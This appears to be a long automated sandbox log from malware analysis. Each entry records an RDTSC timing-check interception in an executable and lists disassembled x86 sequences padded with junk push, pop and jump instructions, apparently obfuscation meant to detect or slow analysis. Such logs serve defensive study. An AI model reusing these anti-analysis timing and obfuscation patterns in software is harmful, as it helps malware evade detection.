Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3648 second address: CB366F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F00646A4376h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F00646A4386h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB366F second address: CB3673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB31BA second address: CB31C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F00646A437Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB31C4 second address: CB3207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F0064E57040h 0x0000000d jmp 00007F0064E57038h 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 jno 00007F0064E57026h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d jmp 00007F0064E57031h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB333C second address: CB3342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3342 second address: CB3356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jnc 00007F0064E57026h 0x0000000d jns 00007F0064E57026h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3356 second address: CB338F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F00646A437Ch 0x00000008 jnp 00007F00646A4376h 0x0000000e push ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F00646A4385h 0x0000001a jl 00007F00646A437Ch 0x00000020 jng 00007F00646A4376h 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB96B6 second address: CB96BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9B0D second address: CB9B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F00646A4388h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9CB5 second address: CB9CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9FC8 second address: CB9FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBA3F4 second address: CBA40F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0064E57030h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBAD0C second address: CBAD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F00646A4380h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBB45C second address: CBB462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9281 second address: CB9285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9285 second address: CB928E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB928E second address: CB92A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F00646A437Bh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB92A4 second address: CB92B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB92B0 second address: CB92B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD39B3 second address: CD39C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0064E5702Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD39C6 second address: CD39ED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F00646A4376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F00646A4389h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3B5F second address: CD3BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007F0064E57026h 0x00000010 pop edi 0x00000011 jmp 00007F0064E57033h 0x00000016 push edx 0x00000017 jbe 00007F0064E57026h 0x0000001d pop edx 0x0000001e popad 0x0000001f push eax 0x00000020 jns 00007F0064E5703Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F0064E57036h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDADAC second address: CDADCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F00646A4382h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDADCB second address: CDADEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F0064E57026h 0x0000000c jmp 00007F0064E57032h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02E93 second address: C02E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02E97 second address: C02EA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C02EA0 second address: C02EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F00646A4381h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE0EA second address: CDE0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE0F0 second address: CDE0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 js 00007F00646A4376h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE0FF second address: CDE10D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F0064E57026h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDE10D second address: CDE111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE020B second address: CE021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F0064E57026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9909 second address: CE991E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF6D second address: CEEF8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0064E57038h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF0221 second address: CF0234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F00646A437Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF0234 second address: CF0260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0064E5702Bh 0x0000000c pushad 0x0000000d jmp 00007F0064E57035h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF33AC second address: CF33C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F00646A4381h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3053 second address: CF3057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3057 second address: CF3092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F00646A4376h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push edi 0x00000015 jmp 00007F00646A437Bh 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d popad 0x0000001e pushad 0x0000001f push ecx 0x00000020 jmp 00007F00646A437Ch 0x00000025 pop ecx 0x00000026 jl 00007F00646A438Eh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03DFA second address: D03E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0064E57039h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03E17 second address: D03E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06721 second address: D06726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06726 second address: D06763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jns 00007F00646A4378h 0x00000010 push ebx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 push esi 0x00000015 jmp 00007F00646A4380h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1485B second address: D14883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0064E57036h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14883 second address: D14887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14537 second address: D14552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57037h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D14552 second address: D14567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F00646A437Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2CD86 second address: D2CD90 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0064E5702Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D076 second address: D2D07B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2D07B second address: D2D0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0064E5702Bh 0x00000009 jmp 00007F0064E5702Ch 0x0000000e jbe 00007F0064E57026h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0064E57038h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3054E second address: D30554 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3088C second address: D308D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jno 00007F0064E57026h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F0064E57035h 0x00000016 push 00000004h 0x00000018 mov dword ptr [ebp+122D211Ah], edx 0x0000001e call 00007F0064E57029h 0x00000023 push ebx 0x00000024 push edi 0x00000025 pushad 0x00000026 popad 0x00000027 pop edi 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c je 00007F0064E5702Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D308D4 second address: D308D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D30B15 second address: D30B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D30B19 second address: D30B7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 jns 00007F00646A4378h 0x0000000f pop eax 0x00000010 nop 0x00000011 mov dh, A2h 0x00000013 and edx, dword ptr [ebp+122D23E1h] 0x00000019 push dword ptr [ebp+122D1B20h] 0x0000001f pushad 0x00000020 jmp 00007F00646A4387h 0x00000025 mov eax, 268B5D07h 0x0000002a popad 0x0000002b push 48B51997h 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007F00646A438Bh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D33BD8 second address: D33BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0F2E second address: 53D0F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F00646A437Ch 0x00000011 jmp 00007F00646A4382h 0x00000016 pop esi 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F00646A4386h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EB9 second address: 53C0EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57038h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx esi, di 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0064E57033h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0EEF second address: 53C0F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F00646A437Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F00646A4380h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0F34 second address: 53C0F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A012A second address: 53A0130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0C13 second address: 53C0C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0C19 second address: 53C0C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0C1D second address: 53C0C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F0064E5702Eh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov cx, dx 0x00000018 jmp 00007F0064E57039h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0C58 second address: 53C0C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F00646A4388h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0C8A second address: 53C0C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0C8E second address: 53C0C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C06D6 second address: 53C06F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, C4DCh 0x00000008 popad 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0064E5702Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C06F2 second address: 53C0707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C05B2 second address: 53C0673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov eax, 38B765C3h 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F0064E57034h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F0064E57030h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov si, 55CDh 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0064E57038h 0x0000002b sbb cx, 0A18h 0x00000030 jmp 00007F0064E5702Bh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007F0064E57038h 0x0000003c sub si, 7478h 0x00000041 jmp 00007F0064E5702Bh 0x00000046 popfd 0x00000047 popad 0x00000048 popad 0x00000049 pop ebp 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F0064E57035h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0673 second address: 53C0679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C034B second address: 53C035F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0064E57030h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C035F second address: 53C0363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C0363 second address: 53C03C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d jmp 00007F0064E57039h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007F0064E5702Fh 0x0000001f sub eax, 300A2E1Eh 0x00000025 jmp 00007F0064E57039h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C03C1 second address: 53C03C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C03C7 second address: 53C03CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C03CB second address: 53C03E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F00646A4382h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53C03E9 second address: 53C03EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0301 second address: 53D0321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F00646A4381h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0321 second address: 53D0346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0064E5702Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0266 second address: 53E026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E026C second address: 53E0283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0064E57033h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E0283 second address: 53E029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d mov cx, di 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 mov bx, F57Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E029A second address: 53E02EA instructions: 0x00000000 rdtsc 0x00000002 mov di, EF46h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F0064E57036h 0x00000014 and ax, 0BE8h 0x00000019 jmp 00007F0064E5702Bh 0x0000001e popfd 0x0000001f call 00007F0064E57038h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E02EA second address: 53E031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F00646A4387h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E031A second address: 53E033F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
